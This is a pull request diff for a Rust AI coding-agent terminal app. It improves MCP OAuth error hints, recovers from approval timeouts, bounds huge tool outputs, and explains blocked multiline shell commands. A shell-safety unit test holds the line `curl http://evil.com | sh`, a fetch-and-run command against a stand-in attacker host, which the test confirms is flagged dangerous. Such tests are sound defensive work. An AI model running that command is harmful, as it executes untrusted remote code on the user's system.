### PR TITLE
fix: 0.8.66 MCP auth and liveness recovery

### DIFF
--- a/crates/tui/src/client/chat.rs
+++ b/crates/tui/src/client/chat.rs
@@ -1429,6 +1429,7 @@ fn compact_tool_result_for_wire(
          exit_status: {}\n\
          original_chars: {original_chars}\n\
          sha256: {sha}\n\
+         retrieve: retrieve_tool_result ref=sha:{sha}\n\
          first_chars:\n\
          {head}\n\n\
          [... truncated {omitted} chars from middle ...]\n\n\
@@ -4144,6 +4145,10 @@ mod stream_decoder_tests {
         assert!(sent.contains("command_or_query: cargo test"), "got: {sent}");
         assert!(sent.contains("original_chars: 14000"), "got: {sent}");
         assert!(sent.contains("sha256:"), "got: {sent}");
+        assert!(
+            sent.contains("retrieve: retrieve_tool_result ref=sha:"),
+            "got: {sent}"
+        );
         assert!(sent.contains(&"A".repeat(4_000)), "got: {sent}");
         assert!(sent.contains(&"Z".repeat(4_000)), "got: {sent}");
         assert!(
@@ -4151,6 +4156,45 @@ mod stream_decoder_tests {
             "got: {sent}"
         );
         assert_ne!(sent, long_output);
+    }
+
+    #[test]
+    fn request_builder_keeps_extreme_tool_output_bounded_and_retrievable() {
+        with_tool_result_sha_spillover_root(|| {
+            let huge_output = format!(
+                "{}{}{}",
+                "DIFF_HEAD\n".repeat(10_000),
+                "MIDDLE_POISON\n".repeat(10_000),
+                "DIFF_TAIL\n".repeat(10_000)
+            );
+            let sha = sha256_hex(huge_output.as_bytes());
+            let messages = vec![
+                tool_use_message("tool-huge", "exec_shell", json!({"command": "git diff"})),
+                tool_result_message("tool-huge", &huge_output),
+            ];
+
+            let built = build_chat_messages(None, &messages, "deepseek-v4-flash");
+            let sent = tool_message_content(&built, 0);
+
+            assert!(sent.contains("[TOOL_RESULT_TRUNCATED]"), "got: {sent}");
+            assert!(sent.contains("tool_name: exec_shell"), "got: {sent}");
+            assert!(sent.contains("command_or_query: git diff"), "got: {sent}");
+            assert!(sent.contains(&format!("sha256: {sha}")), "got: {sent}");
+            assert!(
+                sent.contains(&format!("retrieve: retrieve_tool_result ref=sha:{sha}")),
+                "got: {sent}"
+            );
+            assert!(
+                sent.chars().count() <= TOOL_RESULT_SENT_CHAR_BUDGET,
+                "truncated result should stay bounded, sent {} chars",
+                sent.chars().count()
+            );
+            assert!(
+                !sent.contains("MIDDLE_POISON"),
+                "omitted middle should not be sent to the next model turn"
+            );
+            assert_ne!(sent, huge_output);
+        });
     }
 
     #[test]
@@ -4312,6 +4356,10 @@ mod stream_decoder_tests {
         assert!(
             first.contains(&format!("sha256: {sha}")),
             "truncation block should advertise the recovery SHA, got: {first}"
+        );
+        assert!(
+            first.contains(&format!("retrieve: retrieve_tool_result ref=sha:{sha}")),
+            "truncation block should advertise the recovery command, got: {first}"
         );
 
         // (b) The full content was persisted to the SHA store and is

--- a/crates/tui/src/command_safety.rs
+++ b/crates/tui/src/command_safety.rs
@@ -673,7 +673,11 @@ pub fn analyze_command(command: &str) -> SafetyAnalysis {
         return SafetyAnalysis::dangerous(
             command,
             vec!["Command contains multiple lines".to_string()],
-            vec!["Run one command at a time".to_string()],
+            vec![
+                "Run one command at a time".to_string(),
+                "Write multiline scripts to a file first, then execute the script".to_string(),
+                "Use task_shell_start or background shell for long interactive flows".to_string(),
+            ],
         );
     }
 
@@ -1213,6 +1217,29 @@ mod tests {
         assert_eq!(
             analyze_command("curl http://evil.com | sh").level,
             SafetyLevel::Dangerous
+        );
+    }
+
+    #[test]
+    fn test_multiline_command_explains_safe_workarounds() {
+        let analysis = analyze_command("python3 -c \"print('one')\nprint('two')\"");
+        assert_eq!(analysis.level, SafetyLevel::Dangerous);
+        assert_eq!(analysis.reasons, vec!["Command contains multiple lines"]);
+        assert!(
+            analysis
+                .suggestions
+                .iter()
+                .any(|suggestion| suggestion.contains("Write multiline scripts to a file first")),
+            "{:?}",
+            analysis.suggestions
+        );
+        assert!(
+            analysis
+                .suggestions
+                .iter()
+                .any(|suggestion| suggestion.contains("task_shell_start")),
+            "{:?}",
+            analysis.suggestions
         );
     }
 

--- a/crates/tui/src/main.rs
+++ b/crates/tui/src/main.rs
@@ -5444,7 +5444,13 @@ async fn run_mcp_command(config: &Config, workspace: &Path, command: McpCommand)
         McpCommand::Connect { server } => {
             let mut pool = McpPool::from_config_path_with_workspace(&config_path, workspace)?;
             if let Some(name) = server {
-                pool.get_or_connect(&name).await?;
+                if let Err(err) = pool.get_or_connect(&name).await {
+                    if crate::mcp::oauth::error_looks_auth_required(&err) {
+                        let hint = crate::mcp::oauth::auth_required_login_hint(&name);
+                        return Err(err).context(hint);
+                    }
+                    return Err(err);
+                }
                 println!("Connected to MCP server: {name}");
             } else {
                 let errors = pool.connect_all().await;
@@ -5453,6 +5459,9 @@ async fn run_mcp_command(config: &Config, workspace: &Path, command: McpCommand)
                 } else {
                     for (name, err) in errors {
                         eprintln!("Failed to connect {name}: {err:#}");
+                        if crate::mcp::oauth::error_looks_auth_required(&err) {
+                            eprintln!("  {}", crate::mcp::oauth::auth_required_login_hint(&name));
+                        }
                     }
                 }
             }
@@ -5461,7 +5470,16 @@ async fn run_mcp_command(config: &Config, workspace: &Path, command: McpCommand)
         McpCommand::Tools { server } => {
             let mut pool = McpPool::from_config_path_with_workspace(&config_path, workspace)?;
             if let Some(name) = server {
-                let conn = pool.get_or_connect(&name).await?;
+                let conn = match pool.get_or_connect(&name).await {
+                    Ok(conn) => conn,
+                    Err(err) => {
+                        if crate::mcp::oauth::error_looks_auth_required(&err) {
+                            let hint = crate::mcp::oauth::auth_required_login_hint(&name);
+                            return Err(err).context(hint);
+                        }
+                        return Err(err);
+                    }
+                };
                 if conn.tools().is_empty() {
                     println!("No tools found for MCP server: {name}");
                 } else {
@@ -5477,7 +5495,13 @@ async fn run_mcp_command(config: &Config, workspace: &Path, command: McpCommand)
                     }
                 }
             } else {
-                let _ = pool.connect_all().await;
+                let errors = pool.connect_all().await;
+                for (name, err) in errors {
+                    eprintln!("Failed to connect {name}: {err:#}");
+                    if crate::mcp::oauth::error_looks_auth_required(&err) {
+                        eprintln!("  {}", crate::mcp::oauth::auth_required_login_hint(&name));
+                    }
+                }
                 let tools = pool.all_tools();
                 if tools.is_empty() {
                     println!("No MCP tools discovered.");
@@ -9533,6 +9557,18 @@ mod doctor_mcp_tests {
             McpServerDoctorStatus::Warning(detail) => {
                 panic!("Absolute path should not warn: {detail}")
             }
+        }
+    }
+
+    #[cfg(test)]
+    mod mcp_auth_guidance_tests {
+        #[test]
+        fn mcp_auth_hint_is_actionable_for_connect_failures() {
+            let hint = crate::mcp::oauth::auth_required_login_hint("nordic-mcp");
+            assert_eq!(
+                hint,
+                "MCP server 'nordic-mcp' requires OAuth authentication. Run `codewhale mcp login nordic-mcp` to authenticate."
+            );
         }
     }
 

--- a/crates/tui/src/mcp.rs
+++ b/crates/tui/src/mcp.rs
@@ -1664,11 +1664,14 @@ impl McpPool {
             return Ok(resources);
         }
 
+        let mut items = Vec::new();
         let errors = self.connect_all().await;
         for (server, err) in errors {
             tracing::warn!("Failed to connect MCP server '{server}' for resources: {err:#}");
+            if oauth::error_looks_auth_required(&err) {
+                items.push(Self::mcp_auth_required_error_item(&server));
+            }
         }
-        let mut items = Vec::new();
         for (server, conn) in &self.connections {
             for resource in conn.resources() {
                 items.push(serde_json::json!({
@@ -1705,13 +1708,16 @@ impl McpPool {
             return Ok(templates);
         }
 
+        let mut items = Vec::new();
         let errors = self.connect_all().await;
         for (server, err) in errors {
             tracing::warn!(
                 "Failed to connect MCP server '{server}' for resource templates: {err:#}"
             );
+            if oauth::error_looks_auth_required(&err) {
+                items.push(Self::mcp_auth_required_error_item(&server));
+            }
         }
-        let mut items = Vec::new();
         for (server, conn) in &self.connections {
             for template in conn.resource_templates() {
                 items.push(serde_json::json!({
@@ -1724,6 +1730,14 @@ impl McpPool {
             }
         }
         Ok(items)
+    }
+
+    fn mcp_auth_required_error_item(server: &str) -> serde_json::Value {
+        serde_json::json!({
+            "error": "authentication_required",
+            "server": server,
+            "message": oauth::auth_required_login_hint(server),
+        })
     }
 
     /// Get all discovered prompts with server-prefixed names

--- a/crates/tui/src/mcp/oauth.rs
+++ b/crates/tui/src/mcp/oauth.rs
@@ -43,6 +43,21 @@ impl std::fmt::Display for McpAuthStatus {
     }
 }
 
+pub fn error_looks_auth_required(error: &anyhow::Error) -> bool {
+    let text = format!("{error:#}").to_ascii_lowercase();
+    text.contains("401")
+        || text.contains("unauthorized")
+        || text.contains("authentication_required")
+        || text.contains("not logged in")
+        || text.contains("not-logged-in")
+}
+
+pub fn auth_required_login_hint(server_name: &str) -> String {
+    format!(
+        "MCP server '{server_name}' requires OAuth authentication. Run `codewhale mcp login {server_name}` to authenticate."
+    )
+}
+
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
 pub struct StoredMcpOAuthTokens {
     pub server_name: String,
@@ -207,16 +222,31 @@ impl McpOAuthRuntime {
             return Ok(());
         }
 
-        {
+        let refresh_result = {
             let guard = self.inner.manager.lock().await;
-            guard.refresh_token().await.with_context(|| {
+            guard.refresh_token().await
+        };
+        if let Err(err) = refresh_result {
+            let err = anyhow!(err);
+            if error_looks_auth_required(&err) {
+                self.clear_stored_tokens().await?;
+            }
+            return Err(err).with_context(|| {
                 format!(
                     "refreshing MCP OAuth token for server {}",
                     self.inner.server_name
                 )
-            })?;
+            });
         }
         self.persist_if_needed().await
+    }
+
+    async fn clear_stored_tokens(&self) -> Result<()> {
+        let mut last = self.inner.last_tokens.lock().await;
+        if last.take().is_some() {
+            delete_oauth_tokens(&self.inner.server_name, &self.inner.url)?;
+        }
+        Ok(())
     }
 
     async fn persist_if_needed(&self) -> Result<()> {
@@ -725,11 +755,20 @@ impl OauthLoginFlow {
         if webbrowser::open(&self.auth_url).is_err() {
             eprintln!("Browser launch failed; copy the URL above manually.");
         }
+        println!(
+            "Waiting for browser authorization for MCP server '{}'...",
+            self.server_name
+        );
 
         let result = async {
             let callback = timeout(Duration::from_secs(300), &mut self.rx)
                 .await
-                .context("timed out waiting for OAuth callback")?
+                .with_context(|| {
+                    format!(
+                        "timed out waiting for OAuth callback for MCP server '{}'. Retry from a terminal, or use task_shell_start/background shell if an agent is running the login flow.",
+                        self.server_name
+                    )
+                })?
                 .context("OAuth callback was cancelled")?;
             let OauthCallbackResult { code, state } = match callback {
                 CallbackResult::Success(callback) => callback,
@@ -1007,5 +1046,24 @@ mod tests {
         assert!(key.starts_with("mcp_oauth_"));
         assert!(!key.contains("github"));
         assert!(!key.contains("example.com"));
+    }
+
+    #[test]
+    fn auth_required_classifier_matches_http_401_shapes() {
+        let err = anyhow!("MCP Streamable HTTP rejected status=401 Unauthorized");
+        assert!(error_looks_auth_required(&err));
+
+        let err = anyhow!("authentication_required for remote server");
+        assert!(error_looks_auth_required(&err));
+
+        let err = anyhow!("connection refused");
+        assert!(!error_looks_auth_required(&err));
+    }
+
+    #[test]
+    fn auth_required_login_hint_names_server() {
+        let hint = auth_required_login_hint("nordic-mcp");
+        assert!(hint.contains("nordic-mcp"));
+        assert!(hint.contains("codewhale mcp login nordic-mcp"));
     }
 }

--- a/crates/tui/src/mcp/tests.rs
+++ b/crates/tui/src/mcp/tests.rs
@@ -357,6 +357,19 @@ fn streamable_http_transport_stores_headers() {
 }
 
 #[test]
+fn mcp_auth_required_error_item_is_model_visible() {
+    let item = McpPool::mcp_auth_required_error_item("nordic-mcp");
+    assert_eq!(item["error"], "authentication_required");
+    assert_eq!(item["server"], "nordic-mcp");
+    assert!(
+        item["message"]
+            .as_str()
+            .expect("message")
+            .contains("codewhale mcp login nordic-mcp")
+    );
+}
+
+#[test]
 fn test_mcp_config_parse_mcp_servers_alias_and_snapshot() {
     let dir = tempfile::tempdir().unwrap();
     let path = dir.path().join("mcp.json");

--- a/crates/tui/src/prompts/constitution.md
+++ b/crates/tui/src/prompts/constitution.md
@@ -593,6 +593,10 @@ Use `exec_shell` for shell-native diagnostics, pipelines, and bounded commands.
 For commands expected to take >5 seconds, use `task_shell_start` or background
 shell execution and poll with the wait/interact tools. Keep exact calculations,
 hashes, dates, system state, and other mandatory shell checks in `exec_shell`.
+Do not send multiline `exec_shell` commands, heredocs, or multiline embedded
+scripts such as `python -c` blocks; shell safety blocks them even when
+`allow_shell = true`. Write a script/file first, use single-line commands, or
+use `task_shell_start`/background shell for long manual flows.
 
 ### `agent`
 Use `agent` for independent investigations or implementation slices that can run

--- a/crates/tui/src/runtime_threads.rs
+++ b/crates/tui/src/runtime_threads.rs
@@ -81,6 +81,26 @@ const RUNTIME_RESTART_REASON: &str = "Interrupted by process restart";
 const EMPTY_TURN_REASON: &str = "Turn completed without engine output";
 const APPROVAL_DECISION_TIMEOUT: Duration = Duration::from_secs(300);
 
+#[cfg(test)]
+static TEST_APPROVAL_DECISION_TIMEOUT_MS: std::sync::atomic::AtomicU64 =
+    std::sync::atomic::AtomicU64::new(0);
+
+fn approval_decision_timeout() -> Duration {
+    #[cfg(test)]
+    {
+        let ms = TEST_APPROVAL_DECISION_TIMEOUT_MS.load(std::sync::atomic::Ordering::SeqCst);
+        if ms > 0 {
+            return Duration::from_millis(ms);
+        }
+    }
+    APPROVAL_DECISION_TIMEOUT
+}
+
+#[cfg(test)]
+pub(crate) fn set_test_approval_decision_timeout_ms(ms: u64) -> u64 {
+    TEST_APPROVAL_DECISION_TIMEOUT_MS.swap(ms, std::sync::atomic::Ordering::SeqCst)
+}
+
 const fn default_runtime_schema_version() -> u32 {
     CURRENT_RUNTIME_SCHEMA_VERSION
 }
@@ -3329,7 +3349,8 @@ impl RuntimeThreadManager {
                     }
 
                     let rx = self.register_pending_approval(&id);
-                    match tokio::time::timeout(APPROVAL_DECISION_TIMEOUT, rx).await {
+                    let approval_timeout = approval_decision_timeout();
+                    match tokio::time::timeout(approval_timeout, rx).await {
                         Ok(Ok(ExternalApprovalDecision::Allow { remember })) => {
                             if remember {
                                 self.remember_thread_auto_approve(&thread_id).await;
@@ -3378,7 +3399,21 @@ impl RuntimeThreadManager {
                                 "approval.timeout",
                                 json!({
                                     "approval_id": id,
-                                    "timeout_secs": APPROVAL_DECISION_TIMEOUT.as_secs(),
+                                    "timeout_secs": approval_timeout.as_secs(),
+                                }),
+                            )
+                            .await
+                            .ok();
+                            self.emit_event(
+                                &thread_id,
+                                Some(&turn_id),
+                                None,
+                                "approval.decided",
+                                json!({
+                                    "approval_id": id,
+                                    "decision": "deny",
+                                    "remember": false,
+                                    "timeout": true,
                                 }),
                             )
                             .await
@@ -3817,7 +3852,8 @@ impl crate::tools::spec::DynamicToolExecutor for RuntimeThreadManager {
             )));
         }
 
-        match tokio::time::timeout(APPROVAL_DECISION_TIMEOUT, rx).await {
+        let approval_timeout = approval_decision_timeout();
+        match tokio::time::timeout(approval_timeout, rx).await {
             Ok(Ok(result)) => {
                 let text = dynamic_tool_result_text(&result.content);
                 if result.success {
@@ -3836,7 +3872,7 @@ impl crate::tools::spec::DynamicToolExecutor for RuntimeThreadManager {
             Err(_timeout) => {
                 self.cancel_pending_dynamic_tool(&call_id);
                 Err(crate::tools::spec::ToolError::Timeout {
-                    seconds: APPROVAL_DECISION_TIMEOUT.as_secs(),
+                    seconds: approval_timeout.as_secs(),
                 })
             }
         }

--- a/crates/tui/src/runtime_threads/tests.rs
+++ b/crates/tui/src/runtime_threads/tests.rs
@@ -26,6 +26,22 @@ fn test_manager(data_dir: PathBuf) -> Result<RuntimeThreadManager> {
     )
 }
 
+struct ApprovalTimeoutGuard {
+    previous_ms: u64,
+}
+
+impl Drop for ApprovalTimeoutGuard {
+    fn drop(&mut self) {
+        set_test_approval_decision_timeout_ms(self.previous_ms);
+    }
+}
+
+fn test_approval_timeout_ms(ms: u64) -> ApprovalTimeoutGuard {
+    ApprovalTimeoutGuard {
+        previous_ms: set_test_approval_decision_timeout_ms(ms),
+    }
+}
+
 fn sample_thread(thread_id: &str) -> ThreadRecord {
     let now = Utc::now();
     ThreadRecord {
@@ -1713,6 +1729,125 @@ async fn approval_required_external_deny_is_denied() -> Result<()> {
             base_url: None,
         })
         .await?;
+    Ok(())
+}
+
+#[tokio::test]
+async fn approval_timeout_denies_clears_ui_and_next_turn_can_start() -> Result<()> {
+    let _timeout_guard = test_approval_timeout_ms(25);
+    let manager = test_manager(test_runtime_dir())?;
+    let thread = manager
+        .create_thread(CreateThreadRequest {
+            model: None,
+            workspace: None,
+            mode: None,
+            allow_shell: None,
+            trust_mode: None,
+            auto_approve: None,
+            archived: false,
+            system_prompt: None,
+            task_id: None,
+            ..Default::default()
+        })
+        .await?;
+
+    let mut harness = install_mock_engine(&manager, &thread.id).await;
+    let turn = manager
+        .start_turn(
+            &thread.id,
+            StartTurnRequest {
+                prompt: "needs approval".to_string(),
+                input_summary: None,
+                model: None,
+                mode: None,
+                allow_shell: None,
+                trust_mode: None,
+                auto_approve: None,
+                ..Default::default()
+            },
+        )
+        .await?;
+    assert!(matches!(
+        harness.rx_op.recv().await,
+        Some(Op::SendMessage { .. })
+    ));
+
+    harness
+        .tx_event
+        .send(EngineEvent::ApprovalRequired {
+            approval_key: "timeout_key".to_string(),
+            approval_grouping_key: "timeout_key".to_string(),
+            id: "tool_timeout".to_string(),
+            tool_name: "exec_command".to_string(),
+            description: "external timeout".to_string(),
+            input: serde_json::json!({}),
+            intent_summary: None,
+            approval_force_prompt: false,
+        })
+        .await?;
+
+    let decision = tokio::time::timeout(Duration::from_secs(2), harness.recv_approval_event())
+        .await
+        .context("approval timeout should deny the engine")?;
+    assert_eq!(
+        decision,
+        Some(MockApprovalEvent::Denied {
+            id: "tool_timeout".to_string(),
+        })
+    );
+    assert_eq!(manager.pending_approvals_count(), 0);
+
+    let events = manager.events_since(&thread.id, None)?;
+    assert!(
+        events.iter().any(|event| {
+            event.event == "approval.timeout"
+                && event.payload.get("approval_id").and_then(Value::as_str) == Some("tool_timeout")
+        }),
+        "timeout event should be persisted"
+    );
+    assert!(
+        events.iter().any(|event| {
+            event.event == "approval.decided"
+                && event.payload.get("approval_id").and_then(Value::as_str) == Some("tool_timeout")
+                && event.payload.get("decision").and_then(Value::as_str) == Some("deny")
+                && event.payload.get("timeout").and_then(Value::as_bool) == Some(true)
+        }),
+        "timeout should also emit approval.decided so clients can clear pending UI"
+    );
+
+    harness
+        .tx_event
+        .send(EngineEvent::TurnComplete {
+            usage: Usage::default(),
+            status: TurnOutcomeStatus::Completed,
+            error: None,
+            tool_catalog: None,
+            base_url: None,
+        })
+        .await?;
+    let terminal = wait_for_terminal_turn(&manager, &turn.id, Duration::from_secs(2)).await?;
+    assert_eq!(terminal.status, RuntimeTurnStatus::Completed);
+
+    let _next = manager
+        .start_turn(
+            &thread.id,
+            StartTurnRequest {
+                prompt: "after timeout".to_string(),
+                input_summary: None,
+                model: None,
+                mode: None,
+                allow_shell: None,
+                trust_mode: None,
+                auto_approve: None,
+                ..Default::default()
+            },
+        )
+        .await?;
+    assert!(
+        matches!(harness.rx_op.recv().await, Some(Op::SendMessage { .. })),
+        "thread should accept a fresh turn after approval timeout cleanup"
+    );
+
     Ok(())
 }
 

--- a/crates/tui/src/tools/shell.rs
+++ b/crates/tui/src/tools/shell.rs
@@ -2446,7 +2446,7 @@ impl ToolSpec for ExecShellTool {
                     };
                     return Ok(ToolResult {
                         content: format!(
-                            "BLOCKED: This command was blocked for safety reasons.\n\nReasons: {reasons}{suggestions}"
+                            "BLOCKED: This command was blocked for safety reasons.\n\nReasons: {reasons}{suggestions}\n\nNote: allow_shell=true exposes shell tools, but it does not disable built-in shell safety validation."
                         ),
                         success: false,
                         metadata: Some(json!({

--- a/crates/tui/src/tools/shell/tests.rs
+++ b/crates/tui/src/tools/shell/tests.rs
@@ -259,6 +259,42 @@ async fn read_only_shell_policy_allows_readonly_inspection() {
     );
 }
 
+#[tokio::test]
+async fn exec_shell_multiline_block_explains_allow_shell_boundary() {
+    let tmp = tempdir().expect("tempdir");
+    let ctx = ToolContext::new(tmp.path());
+
+    let result = ExecShellTool
+        .execute(
+            json!({"command": "python3 -c \"print(1)\nprint(2)\""}),
+            &ctx,
+        )
+        .await
+        .expect("execute");
+
+    assert!(!result.success);
+    assert!(result.content.contains("Command contains multiple lines"));
+    assert!(
+        result
+            .content
+            .contains("allow_shell=true exposes shell tools"),
+        "{}",
+        result.content
+    );
+    assert!(
+        result
+            .content
+            .contains("Write multiline scripts to a file first"),
+        "{}",
+        result.content
+    );
+    assert!(
+        result.content.contains("task_shell_start"),
+        "{}",
+        result.content
+    );
+}
+
 #[test]
 fn exec_shell_wait_schema_defaults_to_nonblocking_snapshot() {
     let schema = ShellWaitTool::new("exec_shell_wait").input_schema();

--- a/docs/MCP.md
+++ b/docs/MCP.md
@@ -100,6 +100,13 @@ CodeWhale discovers the server OAuth metadata, opens the authorization URL in
 your browser, listens on a local callback, exchanges the code, and stores the
 token response through the CodeWhale secrets backend. Stored OAuth tokens are
 looked up by server name plus URL and refreshed when possible before requests.
+During login, the CLI prints the authorization URL and a waiting status while
+the local callback listener is active. If a URL-based server returns 401 or
+Unauthorized during connect/discovery, `codewhale mcp connect <name>` reports
+that OAuth authentication is required and points to
+`codewhale mcp login <name>`. Resource helper listings also surface an
+`authentication_required` entry for auth-shaped failures instead of silently
+looking empty.
 
 Optional OAuth fields:
 

--- a/docs/MODES.md
+++ b/docs/MODES.md
@@ -45,6 +45,10 @@ If a shell tool is missing from the model-visible catalog in Agent mode, check
 for an explicit `allow_shell = false` in the active config/profile or runtime
 session. Durable tasks and automation keep conservative omitted-field defaults;
 they only receive shell access when their task settings explicitly grant it.
+`allow_shell = true` controls shell availability only; direct multiline
+`exec_shell` commands remain blocked by shell safety validation. For heredocs,
+embedded scripts, or long manual flows, use single-line commands, write a
+script/file first, or run through `task_shell_start`/background shell.
 YOLO turns shell access on together with trust mode and auto-approval.
 
 All action-capable modes have access to persistent RLM sessions through `rlm_open`, `rlm_eval`, `rlm_configure`, and `rlm_close`. Inside an RLM Python REPL, `sub_query_batch` fans out 1-16 cheap parallel child calls pinned to `deepseek-v4-flash`. The model reaches for it when work is too large or repetitive for the parent transcript.

--- a/docs/TOOL_SURFACE.md
+++ b/docs/TOOL_SURFACE.md
@@ -56,6 +56,12 @@ enables shell access automatically. Plan mode keeps shell execution off.
 | `task_shell_start` | Start a long-running command in the background and return immediately. Preferred over foreground shell for diagnostics, tests, searches, and servers that may run for minutes. |
 | `task_shell_wait` | Poll a background command. If `gate` is supplied after completion, record structured gate evidence on the active durable task. |
 
+`allow_shell = true` exposes shell tools; it does not disable built-in shell
+safety validation. Direct multiline `exec_shell` commands, including heredocs
+and embedded scripts such as multiline `python -c`, are blocked. Use one-line
+commands, write the script/content to a file first and execute it, or start
+long/manual flows with `task_shell_start` or background shell and poll them.
+
 When a foreground shell command times out, the process is not continued
 silently. The tool result tells the model to rerun long work with
 `task_shell_start` or `exec_shell` with `background = true`, then poll with


### PR DESCRIPTION
## Summary
- explains the hard multiline exec_shell safety boundary and documents safe heredoc/script workflows
- surfaces MCP OAuth auth-required failures with login guidance, stale-token cleanup, and model-visible resource errors
- recovers approval timeouts by clearing pending UI state, denying the waiting operation, and accepting the next turn
- keeps extreme tool outputs bounded in model-visible requests and includes retrieve_tool_result SHA recovery hints

## Issues
Fixes #3819
Fixes #3821
Fixes #3827

## Validation
- cargo fmt
- cargo test -p codewhale-tui --bin codewhale-tui --locked approval
- cargo test -p codewhale-tui --bin codewhale-tui --locked mcp_auth
- cargo test -p codewhale-tui --bin codewhale-tui --locked exec_shell_multiline_block_explains_allow_shell_boundary
- cargo test -p codewhale-tui --bin codewhale-tui --locked request_builder_keeps_extreme_tool_output_bounded_and_retrievable